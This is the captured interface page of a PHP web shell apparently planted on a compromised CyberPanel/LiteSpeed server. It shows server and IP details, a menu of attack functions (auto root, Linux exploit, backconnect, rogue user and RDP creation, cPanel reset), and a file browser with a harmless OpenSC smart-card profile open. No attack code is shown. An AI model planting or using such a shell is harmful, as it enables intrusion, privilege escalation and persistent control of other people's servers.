Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
snap /
core20 /
2686 /
usr /
share /
opensc /
[ HOME SHELL ]
Name
Size
Permission
Action
asepcos.profile
2.54
KB
-rw-r--r--
authentic.profile
2.86
KB
-rw-r--r--
cardos.profile
2.77
KB
-rw-r--r--
cyberflex.profile
2.85
KB
-rw-r--r--
entersafe.profile
3.8
KB
-rw-r--r--
epass2003.profile
4.18
KB
-rw-r--r--
flex.profile
3.09
KB
-rw-r--r--
gids.profile
230
B
-rw-r--r--
gpk.profile
2.85
KB
-rw-r--r--
ias_adele_admin1.profile
4.92
KB
-rw-r--r--
ias_adele_admin2.profile
4.9
KB
-rw-r--r--
ias_adele_common.profile
4.84
KB
-rw-r--r--
iasecc.profile
2.84
KB
-rw-r--r--
iasecc_admin_eid.profile
4.91
KB
-rw-r--r--
iasecc_generic_oberthur.profil...
4.56
KB
-rw-r--r--
iasecc_generic_pki.profile
4.9
KB
-rw-r--r--
incrypto34.profile
2.65
KB
-rw-r--r--
isoApplet.profile
2.95
KB
-rw-r--r--
jcop.profile
2.16
KB
-rw-r--r--
miocos.profile
1.16
KB
-rw-r--r--
muscle.profile
3.38
KB
-rw-r--r--
myeid.profile
6.59
KB
-rw-r--r--
oberthur.profile
4.36
KB
-rw-r--r--
openpgp.profile
1.85
KB
-rw-r--r--
pkcs15.profile
3.88
KB
-rw-r--r--
rutoken.profile
5.38
KB
-rw-r--r--
rutoken_ecp.profile
5.9
KB
-rw-r--r--
rutoken_lite.profile
5.41
KB
-rw-r--r--
sc-hsm.profile
400
B
-rw-r--r--
setcos.profile
3.7
KB
-rw-r--r--
starcos.profile
2.69
KB
-rw-r--r--
westcos.profile
3.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gpk.profile
# # PKCS15 r/w profile for GPK cards # cardinfo { max-pin-length = 8; pin-encoding = BCD; pin-pad-char = 0x00; } # Additional filesystem info. # This is added to the file system info specified in the # main profile. filesystem { DF MF { ACL = CREATE=PRO1; DF PKCS15-AppDF { # The PIN file. # The GPK supports just one PIN file per DF, and the file # can hold up to 8 pins (or 4 PIN/PUK pairs). # # Note1: many commands use the short file ID (i.e. the lower # 5 bits of the FID) so you must be careful when picking FIDs # for the public key and PIN files. EF pinfile { file-id = 0000; structure = 0x21; # GPK specific record-length = 8; size = 64; # room for 8 pins ACL = *=NEVER; } # This template defines files for keys, certificates etc. # # When instantiating the template, each file id will be # combined with the last octet of the object's pkcs15 id # to form a unique file ID. template key-domain { # Private key files. # GPK private key files will never let you read the private key # part, so it's okay to set READ=NONE. What's more, we may need # read access so we're able to check the key size/type. EF private-key { file-id = 3010; # This is the base FileID structure = 0x2C; # GPK specific ACL = *=NEVER, READ=NONE, CRYPTO=$PIN, UPDATE=$PIN, WRITE=$PIN; } # Extractable private keys are stored in transparent EFs. # Encryption of the content is performed by libopensc. EF extractable-key { file-id = 3100; structure = transparent; ACL = *=NEVER, READ=$PIN, UPDATE=$PIN, WRITE=$PIN; } # data objects are stored in transparent EFs. EF data { file-id = 3200; structure = transparent; ACL = *=NEVER, READ=NONE, UPDATE=$PIN, WRITE=$PIN; } # private data objects are stored in transparent EFs. EF privdata { file-id = 3220; structure = transparent; ACL = *=NEVER, READ=$PIN, UPDATE=$PIN, WRITE=$PIN; } EF public-key { file-id = 3300; structure = transparent; ACL = *=NONE; } # Certificate template EF certificate { file-id = 3400; structure = transparent; ACL = *=NONE; } } } } }
Close